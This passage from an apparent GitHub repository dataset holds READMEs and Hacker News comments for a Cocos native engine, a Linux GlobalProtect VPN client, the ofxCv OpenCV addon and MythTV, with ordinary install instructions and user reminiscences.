It works on iOS, Android, macOS and Windows.\n\n**For Cocos Creator v3.5+, the native engine has been merged into the [engine repository](https://github.com/cocos/cocos-engine)**\n\n------------------------------------------------\n\nThe major changes:\n\n- Remove 3D features\n - Sprite3D\n - Skybox\n - Terrain\n - Light\n - Navmesh\n - Physics3D\n - BillBoard\n - Animate3D\n - Bundle3D\n - MeshSkin\n - etc.\n\n- Only support iOS, macOS, Android and Windows.\n- Remove support for LUA script\n- Remove deprecated classes and functions\n- Remove Camera\n- Remove Physics integration\n- Using FastTileMap instead of TileMap\n- Remove C++ implementations of CocoStudio parser\n- Remove C++ implementations of CocosBuilder parser\n- Remove AssetsManager, AssetsManagerEX\n- Remove Allocator\n- Remove AutoPolygon\n- Remove support for WebP, S3TC, ATITC\n- Remove support for game controller\n- Improved robustness and many bugs have been fixed\n\nGit user attention\n-----------------------\n\n1. Clone the repo from GitHub.\n\n $ git clone https://github.com/cocos-creator/engine-native.git\n $ cd engine-native\n $ npm install\n\n2. After cloning the repo, please execute `gulp init` to download and install dependencies.\n\n $ gulp init\n\n3. Build the simulator\n\n $ gulp gen-simulator\n $ gulp update-simulator-config\n\n If you need to debug the simulator on macOS, you should sign \"./simulator/mac/simulator.app\" by using `codesign` after building, or manually build the simulator project (\"./tools/simulator/frameworks/runtime-src/proj.ios_mac/simulator.xcodeproj\") in Xcode and enable Signing.\n ![](https://user-images.githubusercontent.com/1503156/32046986-3ab1f0b6-ba0a-11e7-9c7f-7fe0a385d338.png)\n\nContributing to the Project\n--------------------------------\n\nThe engine code is open sourced under the [License](https://github.com/cocos/cocos-engine/blob/develop/licenses/ENGINE_license.txt). We welcome participation!\n
A workaround is to temporarily switch to an older Mesa driver to run Nori. This can be done by running\n```\nexport MESA_LOADER_DRIVER_OVERRIDE=i965\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yuezk/GlobalProtect-openconnect", "link": "https://github.com/yuezk/GlobalProtect-openconnect", "tags": ["openconnect", "gui", "qt5", "linux", "vpn", "globalprotect", "saml", "paloaltonetworks", "okta", "authentication", "azure"], "stars": 645, "description": "A GlobalProtect VPN client (GUI) for Linux, based on OpenConnect and built with Qt5, supports SAML auth mode.", "lang": "C++", "repo_lang": "", "readme": "# GlobalProtect-openconnect\nA GlobalProtect VPN client (GUI) for Linux, based on OpenConnect and built with Qt5. It supports SAML auth mode and is inspired by [gp-saml-gui](https://github.com/dlenski/gp-saml-gui).\n\n
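Under the hood it drives OpenConnect, which can also reach a GlobalProtect portal directly from the command line; a minimal sketch for comparison, assuming OpenConnect 8.x and a placeholder portal address:\n\n```sh\n# connect to a GlobalProtect portal/gateway with plain OpenConnect\nsudo openconnect --protocol=gp vpn.example.com\n```\n\n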
\n\n\"Buy\n\"Support\n\"Buy\n\n\n## Features\n\n- Similar user experience as the official client in macOS.\n- Supports both SAML and non-SAML authentication modes.\n- Supports automatically selecting the preferred gateway from the multiple gateways.\n- Supports switching gateway from the system tray menu manually.\n\n\n## Install\n\n|OS|Stable version | Development version|\n|---|--------------|--------------------|\n|Linux Mint, Ubuntu 18.04 or later|[ppa:yuezk/globalprotect-openconnect](https://launchpad.net/~yuezk/+archive/ubuntu/globalprotect-openconnect)|[ppa:yuezk/globalprotect-openconnect-snapshot](https://launchpad.net/~yuezk/+archive/ubuntu/globalprotect-openconnect-snapshot)|\n|Arch, Manjaro|[globalprotect-openconnect](https://archlinux.org/packages/community/x86_64/globalprotect-openconnect/)|[AUR: globalprotect-openconnect-git](https://aur.archlinux.org/packages/globalprotect-openconnect-git/)|\n|Fedora|[copr: yuezk/globalprotect-openconnect](https://copr.fedorainfracloud.org/coprs/yuezk/globalprotect-openconnect/)|[copr: yuezk/globalprotect-openconnect](https://copr.fedorainfracloud.org/coprs/yuezk/globalprotect-openconnect/)|\n|openSUSE, CentOS 8|[OBS: globalprotect-openconnect](https://build.opensuse.org/package/show/home:yuezk/globalprotect-openconnect)|[OBS: globalprotect-openconnect-snapshot](https://build.opensuse.org/package/show/home:yuezk/globalprotect-openconnect-snapshot)|\n\nAdd the repository in the above table and install it with your favorite package manager tool.\n\n[![Arch package](https://repology.org/badge/version-for-repo/arch/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![AUR package](https://repology.org/badge/version-for-repo/aur/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Manjaro Stable package](https://repology.org/badge/version-for-repo/manjaro_stable/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Manjaro Testing package](https://repology.org/badge/version-for-repo/manjaro_testing/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Manjaro Unstable package](https://repology.org/badge/version-for-repo/manjaro_unstable/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![nixpkgs unstable package](https://repology.org/badge/version-for-repo/nix_unstable/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Parabola package](https://repology.org/badge/version-for-repo/parabola/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n\n### Linux Mint, Ubuntu 18.04 or later\n\n```sh\nsudo add-apt-repository ppa:yuezk/globalprotect-openconnect\nsudo apt-get update\nsudo apt-get install globalprotect-openconnect\n```\n\n> For Linux Mint, you might need to import the GPG key with: `sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 7937C393082992E5D6E4A60453FC26B43838D761` if you encountered an error `gpg: keyserver receive failed: General error`.\n\n### Arch Linux / Manjaro\n\n```sh\nsudo pacman -S globalprotect-openconnect\n```\n\n### AUR snapshot version\n\n```sh\nyay -S globalprotect-openconnect-git\n```\n\n### Fedora\n\n```sh\nsudo dnf copr enable yuezk/globalprotect-openconnect\nsudo dnf install globalprotect-openconnect\n```\n\n### openSUSE\n\n- openSUSE Tumbleweed\n ```sh\n sudo zypper ar 
https://download.opensuse.org/repositories/home:/yuezk/openSUSE_Tumbleweed/home:yuezk.repo\n sudo zypper ref\n sudo zypper install globalprotect-openconnect\n ```\n\n- openSUSE Leap\n\n ```sh\n sudo zypper ar https://download.opensuse.org/repositories/home:/yuezk/openSUSE_Leap_15.2/home:yuezk.repo\n sudo zypper ref\n sudo zypper install globalprotect-openconnect\n ```\n### CentOS 8\n\n1. Add the repository: `https://download.opensuse.org/repositories/home:/yuezk/CentOS_8/home:yuezk.repo`\n1. Install `globalprotect-openconnect`\n\n\n## Build & Install from source code\n\nClone this repo with:\n\n```sh\ngit clone https://github.com/yuezk/GlobalProtect-openconnect.git\ncd GlobalProtect-openconnect\n```\n\n### MX Linux\nThe following instructions are for **MX-21.2.1_x64 KDE**.\n\n```sh\nsudo apt install qttools5-dev libsecret-1-dev libqt5keychain1\n./scripts/install-debian.sh\n```\n\n### Ubuntu/Mint\n\n> **\u26a0\ufe0f REQUIRED for Ubuntu 18.04 \u26a0\ufe0f**\n>\n> Add this [dwmw2/openconnect](https://launchpad.net/~dwmw2/+archive/ubuntu/openconnect) PPA first to install the latest openconnect.\n>\n> ```sh\n> sudo add-apt-repository ppa:dwmw2/openconnect\n> sudo apt-get update\n> ```\n\nBuild and install with:\n\n```sh\n./scripts/install-ubuntu.sh\n```\n### openSUSE\n\nBuild and install with:\n\n```sh\n./scripts/install-opensuse.sh\n```\n\n### Fedora\n\nBuild and install with:\n\n```sh\n./scripts/install-fedora.sh\n```\n\n### Other Linux\n\nInstall the Qt5 dependencies and OpenConnect:\n\n- QtCore\n- QtWebEngine\n- QtWebSockets\n- QtDBus\n- openconnect v8.x\n- qtkeychain\n\n...then build and install with:\n\n```sh\n./scripts/install.sh\n```\n\n\n### NixOS\n In `configuration.nix`:\n\n ```\n services.globalprotect = {\n enable = true;\n # if you need a Host Integrity Protection report\n csdWrapper = \"${pkgs.openconnect}/libexec/openconnect/hipreport.sh\";\n };\n\n environment.systemPackages = [ globalprotect-openconnect ];\n ```\n\n## Run\n\nOnce the software is installed, you can run `gpclient` to start the UI.\n\n## Passing the Custom Parameters to `OpenConnect` CLI\n\nSee [Configuration](https://github.com/yuezk/GlobalProtect-openconnect/wiki/Configuration)\n\n## Display the system tray icon on Gnome 40\n\nInstall the [AppIndicator and KStatusNotifierItem Support](https://extensions.gnome.org/extension/615/appindicator-support/) extension and you will see the system tray icon (restart the system after the installation).\n\n
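If the icon still does not appear, you can verify that the extension is actually enabled; a quick check, assuming the `gnome-extensions` CLI that ships with recent GNOME:\n\n```sh\n# list the extensions that are currently enabled\ngnome-extensions list --enabled\n```\n\n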
## Troubleshooting\n\nRun `gpclient` in the Terminal and collect the logs.\n\n## [License](./LICENSE)\nGPLv3\n", "readme_type": "markdown", "hn_comments": "Official openconnect client source is on gitlab btw: https://gitlab.com/openconnect/openconnect To avoid this problem, once I know the name of the project, I research it to find the official site / project page and then follow their links to source.To answer your original question, security is very complex and it's not hard to hide backdoors or malicious functionality from the uninitiated. If you're not an appsec person by trade, it's probably safer to pay to have it professionally audited.That's usually cost prohibitive. You can try free SAST and DAST scanners for code (run in a VM or on a VPS for DAST scanning - VPS has the added benefit that if it's serious malware that includes VM escape, your system is still safe) as well as multiscanners like virustotal for compiled binaries, but do not assume that a lack of findings in those means a tool, project, or binary is safe.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kylemcdonald/ofxCv", "link": "https://github.com/kylemcdonald/ofxCv", "tags": ["openframeworks", "addon", "opencv", "wrapper", "computer-vision"], "stars": 645, "description": "Alternative approach to interfacing with OpenCv from openFrameworks.", "lang": "C++", "repo_lang": "", "readme": "# Introduction\n\nofxCv represents an alternative approach to wrapping OpenCV for openFrameworks.\n\n# Installation\n\nFirst, pick the branch that matches your version of openFrameworks:\n\n* OF [stable](https://github.com/openframeworks/openFrameworks/tree/stable) (0.9.8): use [ofxCv/stable](https://github.com/kylemcdonald/ofxCv/tree/stable)\n* OF [master](https://github.com/openframeworks/openFrameworks) (0.10.0): use [ofxCv/master](https://github.com/kylemcdonald/ofxCv/)\n\nEither clone the source code using git:\n\n\t> cd openFrameworks/addons/\n\t> git clone https://github.com/kylemcdonald/ofxCv.git\n\nOr download the source from GitHub [here](https://github.com/kylemcdonald/ofxCv/archive/master.zip), unzip the folder, rename it from `ofxCv-master` to `ofxCv` and place it in your `openFrameworks/addons` folder.\n\nTo run the examples, import them into the project generator, create a new project, and open the project file in your IDE.\n\n# Goals\n\nofxCv has a few goals driving its development.\n\n### Wrap complex things in a helpful way\n\nSometimes this means: providing wrapper functions that require fewer arguments than the real CV functions, providing a smart interface that handles dynamic memory allocation to make things faster for you, or providing in place and out of place alternatives.\n\n### Present the power of OpenCv clearly\n\nThis means naming things in an intuitive way, and, more importantly, providing classes that have methods that transform the data represented by that class. It also means providing demos of CV functions, and generally being more useful than ofxOpenCv.\n\n### Interoperability of openFrameworks and OpenCv\n\nMaking it easy to work directly with CV by providing lightweight conversion functions, and providing wrappers for CV functions that do the conversions for you.\n\n### Elegant internal OpenCv code\n\nProvide clean implementations of all functions as a stepping stone to direct OpenCV use. 
This means using function names and variable names that follow the OpenCV documentation, and spending the time to learn proper CV usage so I can explain it clearly to others through code. Sometimes there will be heavy templating in order to make OF interoperable with OpenCV, but this should be avoided in favor of using straight OpenCV as often as possible.\n\n# Usage\n\nSometimes this readme will fall out of date. Please refer to the examples as the primary reference in that case.\n\n## Project setup\n\nUsing ofxCv requires:\n\n* ofxCv/libs/ofxCv/include/: contains all the ofxCv headers.\n* ofxCv/libs/ofxCv/src/: contains all the ofxCv source.\n* ofxCv/src/: ties together all of ofxCv into a single include.\n* opencv/include/: the OpenCv headers, located in addons/ofxOpenCv/\n* opencv/lib/: the precompiled static OpenCv libraries, located in addons/ofxOpenCv/\n\nYour linker will also need to know where the OpenCv headers are. In Xcode this means modifying one line in Project.xconfig:\n\n\tHEADER_SEARCH_PATHS = $(OF_CORE_HEADERS) \"../../../addons/ofxOpenCv/libs/opencv/include/\" \"../../../addons/ofxCv/libs/ofxCv/include/\"\n\nAlternatively, I recommend using [OFXCodeMenu](https://github.com/openframeworks/OFXcodeMenu) to add ofxCv to your project.\n\n## Including ofxCv\n\nInside your ofApp.h you will need one include:\n\n\t#include \"ofxCv.h\"\n\nOpenCv uses the `cv` namespace, and ofxCv uses the `ofxCv` namespace. You can automatically import them by writing this in your `.cpp` files:\n\n\tusing namespace cv;\n\tusing namespace ofxCv;\n\nIf you look inside the ofxCv source, you'll find lots of cases of `ofxCv::` and `cv::`. In some rare cases, you'll need to write `cv::` in your code. For example, on OSX `Rect` and `Point` are defined by OpenCv, but also by `MacTypes.h`. So if you're using an OpenCv `Rect` or `Point` you'll need to say so explicitly with `cv::Rect` or `cv::Point` to disambiguate.\n\nofxCv takes advantage of namespaces by using overloaded function names. This means that the ofxCv wrapper for `cv::Canny()` is also called `ofxCv::Canny()`. If you write simply `Canny()`, the correct function will be chosen based on the arguments you pass.\n\n## Working with ofxCv\n\nUnlike ofxOpenCv, ofxCv encourages you to use either native openFrameworks types or native OpenCv types, rather than introducing a third type like `ofxCvImage`. To work with OF and OpenCv types in a fluid way, ofxCv includes the `toCv()` and `toOf()` functions. They provide the ability to convert openFrameworks data to OpenCv data and vice versa. For large data, like images, this is done by wrapping the data rather than copying it. For small data, like vectors, this is done by copying the data.\n\nThe rest of ofxCv is mostly helper functions (for example, `threshold()`) and wrapper classes (for example, `Calibration`).\n\n### toCv() and copy()\n\n`toCv()` is used to convert openFrameworks data to OpenCv data. For example:\n\n\tofImage img;\n\timg.load(\"image.png\");\n\tMat imgMat = toCv(img);\n\nThis creates a wrapper for `img` called `imgMat`. To create a deep copy, use `clone()`:\n\n\tMat imgMatClone = toCv(img).clone();\n\nOr `copy()`, which works with any type supported by `toCv()`:\n\n\tMat imgCopy;\n\tcopy(img, imgCopy);\n\n`toCv()` is similar to ofxOpenCv's `ofxCvImage::getCvImage()` method, which returns an `IplImage*`. The biggest difference is that you can't always use `toCv()` \"in place\" when calling OpenCv code directly. 
In other words, you can always write this:\n\n\tMat imgMat = toCv(img);\n\tcv::someFunction(imgMat, ...);\n\nBut you should avoid using `toCv()` like this:\n\n\tcv::someFunction(toCv(img), ...);\n\nbecause there are cases where in-place usage will cause a compile error. More specifically, calling `toCv()` in place will fail if the function requires a non-const reference for that parameter.\n\n### imitate()\n\n`imitate()` is primarily used internally by ofxCv. When doing CV, you regularly want to allocate multiple buffers of similar dimensions and channels. `imitate()` follows a kind of prototype pattern, where you pass a prototype image `original` and the image to be allocated `mirror` to `imitate(mirror, original)`. `imitate()` has two big advantages:\n\n* It works with `Mat`, `ofImage`, `ofPixels`, `ofVideoGrabber`, and anything else that extends `ofBaseHasPixels`.\n* It will only reallocate memory if necessary. This means it can be used liberally.\n\nIf you are writing a function that returns data, the ofxCv style is to call `imitate()` on the data to be returned from inside the function, allocating it as necessary.\n\n### drawMat() vs. toOf()\n\nSometimes you want to draw a `Mat` to the screen directly, as quickly and easily as possible, and `drawMat()` will do this for you. `drawMat()` is not the most efficient way of drawing images to the screen, because it creates a texture every time it draws. If you want to draw things efficiently, you should allocate a texture using `ofImage img;` *once* and draw it using `img.draw()`. There are two ways to keep that texture up to date:\n\n1. Either use `Mat mat = toCv(img);` to treat the `ofImage` as a `Mat`, modify the `mat`, then call `img.update()` to upload the modified pixels to the GPU.\n2. Alternatively, call `toOf(mat, img)` each time after modifying the `Mat`. This will only reallocate the texture if necessary, e.g. when the size has changed.\n\n\n# Working with OpenCv 2\n\nOpenCv 2 is an incredibly well designed API, and ofxCv encourages you to use it directly. Here are some hints on using OpenCv.\n\n### OpenCv Types\n\nOpenCv 2 uses the `Mat` class in place of the old `IplImage`. Memory allocation, copying, and deallocation are all handled automatically. `operator=` is a shallow, reference-counted copy. A `Mat` contains a collection of `Scalar` objects. A `Scalar` contains a collection of basic types (unsigned char, bool, double, etc.). `Scalar` is a short vector for representing color or other multidimensional information. The hierarchy is: `Mat` contains `Scalar`, `Scalar` contains basic types.\n\nDifferent functions accept `Mat` in different ways:\n\n* `Mat` will create a lightweight copy of the underlying data. It's easy to write, and it allows you to use `toCv()` \"in-place\" when passing arguments to the function.\n* `Mat&` allows the function to modify the header passed in. This means the function can allocate if necessary.\n* `const Mat&` means that the function isn't going to modify the underlying data. This should be used instead of `Mat` when possible. It also allows \"in-place\" `toCv()` usage.\n\n### Mat creation\n\nIf you're working with `Mat` directly, it's important to remember that OpenCv talks about `rows` and `cols` rather than `width` and `height`. This means that the arguments are \"backwards\" when they appear in the `Mat` constructor. 
Here's an example of creating a `Mat` wrapper for some grayscale `unsigned char* pixels` for which we know the `width` and `height`:\n\n\tMat mat = Mat(height, width, CV_8UC1, pixels, 0);\n\n### Mat operations\n\nBasic mathematical operations on `Mat` objects of the same size and type can be accomplished with matrix expressions. Matrix expressions are a collection of overloaded operators that accept `Mat`, `Scalar`, and basic types. A normal mathematical operation might look like:\n\n\tfloat x, a, b;\n\t...\n\tx = (a + b) * 10;\n\nA matrix operation looks similar:\n\n\tMat x, a, b;\n\t...\n\tx = (a + b) * 10;\n\nThis will add every element of `a` and `b`, then multiply the results by 10, and finally assign the result to `x`.\n\nAvailable matrix expressions include the mathematical operators `+`, `-`, `/` (per-element division), `*` (matrix multiplication), and `.mul()` (per-element multiplication), as well as the comparison operators `!=`, `==`, `<`, `>`, `>=`, `<=` (useful for thresholding), the binary operators `&`, `|`, `^`, `~`, and a few others like `abs()`, `min()`, and `max()`. For the complete listing see the OpenCv documentation or `mat.hpp`.\n\n# Code Style\n\nofxCv tries to have a consistent code style. It's most similar to the K&R variant used for Java, and the indentation is primarily determined by Xcode's auto-indent feature.\n\nMultiline comments are used for anything beyond two lines.\n\nCase statements have a `default:` fall-through with the last case.\n\nWhen two or three similar variables are initialized, commas are used instead of multiple lines. For example `Mat srcMat = toCv(src), dstMat = toCv(dst);`. This style was inherited from reading Jason Saragih's FaceTracker.\n\n---\n\n*ofxCv was developed with support from [Yamaguchi Center for Arts and Media](http://ycam.jp/).*\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MythTV/mythtv", "link": "https://github.com/MythTV/mythtv", "tags": [], "stars": 644, "description": "The official MythTV repository", "lang": "C++", "repo_lang": "", "readme": "[![build](https://github.com/MythTV/mythtv/workflows/master/badge.svg)](https://github.com/MythTV/mythtv/actions)\n[![Coverity scan](https://scan.coverity.com/projects/153/badge.svg)](https://scan.coverity.com/projects/mythtv)\n[![GitHub issues](https://img.shields.io/github/issues/MythTV/mythtv)](https://github.com/MythTV/mythtv/issues)\n[![GitHub pull requests](https://img.shields.io/github/issues-pr/MythTV/mythtv)](https://github.com/MythTV/mythtv/pulls)\n![GitHub top language](https://img.shields.io/github/languages/top/MythTV/mythtv)\n\n\n# Welcome to MythTV\n\n* Documentation\n * [Documentation/Wiki](https://www.mythtv.org/wiki)\n * [User Manual](https://www.mythtv.org/wiki/User_Manual:Index)\n * [FAQ](https://www.mythtv.org/wiki/Frequently_Asked_Questions)\n\n* User and developer discussion\n * [Forums](https://forum.mythtv.org)\n * [Mailing lists](https://lists.mythtv.org/mailman/listinfo)\n * [IRC](https://www.mythtv.org/wiki/IRC)\n * [Users](https://web.libera.chat/?nick=Guest?#mythtv-users): ircs://irc.libera.chat:6697/mythtv-users (Libera.\u200bChat, #mythtv-users)\n * [Developers](https://web.libera.chat/?nick=Guest?#mythtv): ircs://irc.libera.chat:6697/mythtv (Libera.\u200bChat, #mythtv)\n\n* License\n * MythTV is licensed under the GPLv2; see LICENSE for details\n * This applies to all code unless otherwise stated in the source files or to code in an external/ directory\n\n* Contributions\n * If 
you have patches for a new feature or a bug fix, please consider forking the project on [GitHub](https://github.com/MythTV/mythtv) and creating a pull request.\n * Please note: If you create a pull request, please take care to follow the Pull Request checklist.\n * We only support code that is from the canonical MythTV repository at https://github.com/MythTV. For other forks of MythTV, please send bug reports to the owners of the fork where the code was committed.\n * [Open a new issue](https://github.com/MythTV/mythtv/issues/new/choose)\n * [Create a pull request](https://github.com/MythTV/mythtv/compare)\n\n* Development\n * [Source code documentation (doxygen)](https://code.mythtv.org/doxygen)\n * [Coding standards](https://www.mythtv.org/wiki/Coding_Standards)\n * [Buildbot status](https://code.mythtv.org/buildbot)\n * [Github workflows](https://github.com/MythTV/mythtv/actions)\n * [cppcheck report](https://code.mythtv.org/cppcheck)\n * [Coverity scan](https://scan.coverity.com/projects/mythtv)\n * [Translation status](http://www.insidethex.co.uk/mythtv/translation-status/master)\n * [Old ticketing system (trac)](https://code.mythtv.org/trac)\n", "readme_type": "markdown", "hn_comments": "Wow, had no idea this thing was still around. Takes me back to neo Kodi/XBMC/Windows ME days. So much hardware and software to accomplish what a small stick does today.I tired for along time to get MythTV working with limited success. The Silicon Dust tuners were new at the time and support was spotty. I eventually gave up and used Windows MCE but it was limited to a single TV.I ended up replacing all of it with a 1st Gen TabloTV, Plex and a Roku. I'm still rocking that TabloTV today. There's something to be said for having an appliance that just works.I'm still rocking my 13 year old SageTV installation. Even the hardware clients are still working well. So grateful they were allowed to open source the software after Google acquired it.Looks like only one small past thread:MythTV: An Open Source Digital Video Recorder - https://news.ycombinator.com/item?id=29634491 - Dec 2021 (3 comments)I loved MythTV, but I moved to a valley so I can't pull in any OTA broadcasts anymore :(Love mythtv. I've been using it since about 2003 or so. It was definitely a janky experience in the beginning, but once I was able to ditch needing an IR blaster it became an absolute pleasure to setup and use.Oh man, I still have my hauppauge wintv card. Useless these days with analog broadcasts no longer being a thing.If you're curious about the version number, it was changed from 0.xx to xx.0 for release 29. https://www.mythtv.org/wiki/Frequently_Asked_Questions#When_...Wanna do it with a retired pc? I recommend ps3 usb tv tuners. aka \"Play TV\" plentiful on second hand sights. Each has 2 tuners in it. Do you even need 2 of these devices to get 4? Ever had a 3rd thing to record or watch simultaneously? Might as well, they are very cheap.xbmc with the myth plugin on the frontend is great if you own the thing that drives your tv screen. If you use appletv it seems you don't own it and can't run xbmc or mythtv frontend on it. But you can pay apple a sub and then also pay again for anything you might want to watch out of their stunningly limited selection. That's always apple's solution: Pay apple more to get something that isn't what you wanted...the auto commercial skipping was the killer app feature of MythTV. 
Really enjoyed MythTV.Havn't looked at it; but, wish it would work with streaming services / on-demand.MythTV stats from my house media server:Number of shows: 442Number of episodes: 25061First recording: Monday February 19th, 2007Last recording: Sunday February 5th, 2023Total Running Time: 15 years 11 months 16 days 5 hrs 30 minsTotal Recorded: 2 years 1 month 13 days 18 minsPercent of time spent recording: 13%Specs: 2-core Intel CPU, 8GB RAM, 250 GB SATA SSD root, 6TB of mirrored storage, which is perpetually nearly full.I tried to get this to work multiple times around 2004. This might be where I first dove into linux. I gave up every time. I ended up using windows media center which worked flawlessly for years. I moved on to plex and a hdtvhomerun when they released it (it handles deleting old series, etc). About a year ago I realized I don't really watch live TV anymore and unplugged it.MythTV was the reason I bought and assembled my first x86 PC. I even bought a copy of Red Hat Linux 8 Personal (before Fedora) to run on it. That system became my main desktop PC and is still running more than 20 years later -- like a Ship of Theseus, with every hardware and software component upgraded multiple times. I'm not a progammer but I wanted to help fix bugs and add features, so it was also the reason I learned C++ and MySQL.I still use MythTV (with additional PCs as backends and frontends) to record Comcast digital cable with HDHomerun Cable Card tuners. It also serves my small library of music files and can play DVDs and BluRay discs. I've ripped 4k UHD BluRay discs using MakeMKV and MythTV can play the files but the colors are wrong since a lot of the plumbing needs HDR support.First I thought I had clicked something that showed really old postings. I had no idea MythTV would still be around.\nI never used MythTV though; I used Freevo in the 2000s. Worked quite well once I had it configured. Every once in a while I looked over the fence to see if the DVRs were greener on the other side, but never got around trying MythTV.\nI still have many shows and episodes I saved with Freevo, on old hard drives somewhere.Neat!It'd be nice if there were consumer-ready hardware for something like this. I know a few people with VCRs (yes, in 2023) that still record to tape from their digital receiver and play back over composite.I'm amazed that you can't just buy a device that acts like a VCR, with composite and line in and out, but records and plays back via digital files instead of tape.I want to try this, perhaps using an older Intel Mac mini, but I'm wondering how to \"sell\" it to someone who just wants a VCR.Wow MythTV! This is a blast from the past. I was using this back in ~2006 or so. It sorta worked haha.It's ashame that MythWeb isn't under active development anymore[0]. The MythWeb change log in the 0.33 release doesn't have any commits newer than June 4, 2022.Maybe I'm weird but I use MythWeb exclusively even though I run MythTV on my office workstation. mythfrontend is nice but I find it easier (read: more window manager-friendly) to use mpv to play recordings.[0] https://www.mythtv.org/wiki/MythWebBig fan of MythTV here and daily user forever now.Paired with an HDHomerun and Jellyfin, MythTV really gives one a pretty good poor man's Youtube TV with no recurring fees. One of mine runs in a virtual machine in the garage at my family's farm, with a custom script beaming me my childhood local news to enjoy over coffee in the morning.Damn, nostalgia. MythTV, DVR's, ahem, pirate keys for deco's... 
good times.Now I don't want a TV near me in kilometers.I used MythTV extensively in the late 2000s to capture over the air (OTA) tv. My kids were young and it was a terrific way to capture tv shows for them (and for me when doing 2AM feedings).It's ability to identify and skip commercials was awesome and I'm sure it's gotten better. The biggest issues I had were hardware related to the capture devices and getting remotes to work.Honestly, given the state of streaming (40 different services all carrying different content), it might be worth looking at again.I used MythTV for several years, until Comcast went digital in my neck of the woods, and my tuner card was useless. What do people tune to content with now? Is it all IR control of a cable box?I've used MythTV since something like 2004. Still great to use for Digital OTA broadcasts (and free-to-air satellite / DVB if that's available in your area). Cable DRM has unfortunately made it much less useful for recording cable broadcasts, thanks to them being allowed to encrypt all QAM signals, and now aren't required to support/provide CableCards either: https://www.nexttv.com/news/charter-cuts-off-cablecard-suppo...Sort of waiting for some new iteration of what \"popcorn time\" was. With all the fragmentation of content across different providers, and more aggressive actions on account sharing, crossing region restrictions, etc...it feels like average people are now starting to complain a lot.There is an opening for a very beginner friendly pirate platform to rise again. Not because nobody wants to pay exactly, but because doing it legally is complex now.This takes me back! The first home server I ran had a TV capture card, ran Gentoo with MythTV, was hooked up to the living room TV, and was a pretty good source of entertainment for the gradstudent apartment I shared. Saving broadcasts, trimming out commercials, ... and of course fun with running a Linux server.Good to see the project still going 10-15 years after I first heard of it (though I haven't used it in a long time)!Check out channels dvr (getchannels.com/dvr) as a modern, actively developed DVR. I love it. I'm running Channels on an ESXi host and just use the AppleTV app as the interface.I was always very impressed with MythTV. It was the first project that I saw that made really good use of versioning their mysql database with SQL queries to change the schema linked to the software version.I used it extensively. I obsessively recorded everything off over the air digital TV and wrote it to DVDs. I had a little script to look up ratings of movies in IMDB, apply weighting factors due to personal tastes and record all the ones which made the grade. I'd then edit the commercials out and burn to DVDs all losslessly.However, this all came to an end when my 2 year old son took the running hosepipe from the garden one summer, through the open patio doors into the house and proceeded to fill up the MythTV computer with water (along with the TV, VCR, DVD player and sofa!).I never quite had the heart to resurrect the system after that and it was an end to my MythTV obsession. It was fun while it lasted.I have fond memories of using MythTV. It was a great alternative to Microsoft Media Center. Automatic advertisement removal, great scheduled recording capabilities. As most of this functionality comes with your TV or settopbox today, I wonder how popular MythTV is today.Headless MythTV Backend on a low power m1max-64GB with 8 USB3.1 ports would be perfect. 
I sure as hell would never run a mission critical data processing app on those chips, but like Amiga, they are built for A/V, ML and rendering workloads\u2026and they don\u2019t draw much nrg or generate much heat, which is important in a household setup.Likewise, much of modern automotive infotainment is just catching up to where the duct-tape geniuses of mp3car.com were twenty years ago.Haha yeah. I had this cool horizontal micro ATX case that housed a full computer and still looked like a media device. Had to use risers to mount the GPU horizontal.Then a few years later a single Raspberry Pi did the trick.Wasn't Plex founded out of some of the remnants of the XBMC team?I can't claim to have hacked on MythTV or XBMC, but I certainly used them back then, and worked on television set-top box software for much of the ~2001-2017 time frame. As a systems programmer for these devices, I'm afraid I don't have much insight into high-level details like content licensing.However, as a developer of commercial products in those days, I can say that our hands were tied in some ways. For example, showing the electronic program guide as a grid was problematic due to patents owned by TV Guide. I suspect the grassroots projects were able to play a bit more fast and loose with these things, thus leading to the UI differences you observed.My parents didn't want me taking apart the Xbox so I had to convince them I knew what I was doing. Finally got a modchip in 2002. After putting it in, the Xbox didn't boot up. I didn't know why because I was an idiot 13 year old who didn't know what they were doing and getting concrete instructions on what to do was harder back then. My parents weren't happy.Yes,. a great many hours.\nBuilding PC's, trying to make them quiet enough to tolerate. Buying expensive Haupage hardware encoding boards, DTV tuners and programmable remotes. Getting the software to work at the right resolution, getting the driver to work.In Australia TV listing were copywritable, so we had to crowdsource that too.I built HTPC using ShuttlePC with MythTV back then. I also integrated home automation to control the lights and audio distribution around the house using X-10. Back then, the phone were still analog and one of the X-10 light module would turns on when I get a call. I had a Sony projector with a 105 in screen and 5.1 surround sound. When the movie starts the lights would dim and the curtains would close. Getting a cable card was expensive back then. I had DirecTV so set up an IR relay with X-10 to control the channels.\nTorn out the walls to run all the wires and consolidated everything in a closet. It was a sweet set up. Good times.Yes, I started with a massive Windows 8 Media center PC in 2003 which evolved to an Xbox1 with XBMC, followed by a couple of all in one PCs which could load standalone XBMC Linux based kernels by 2010.Around 2015, I switched to having a Synology NAS hold the content with small streaming devices around the house with Plex running on both ends.But these days 99% of the content we want is on Netflix, HBO Max, or Disney+. We occasionally rent movies via AppleTV. I can get all the content I want more conveniently through these services. And I am rarely debugging the setup during a family movie night while my wife and daughters groan about how my stuff never works.I hacked on the original TiVo and MythTV a bit; did not contribute much back, but I had a lot of fun. 
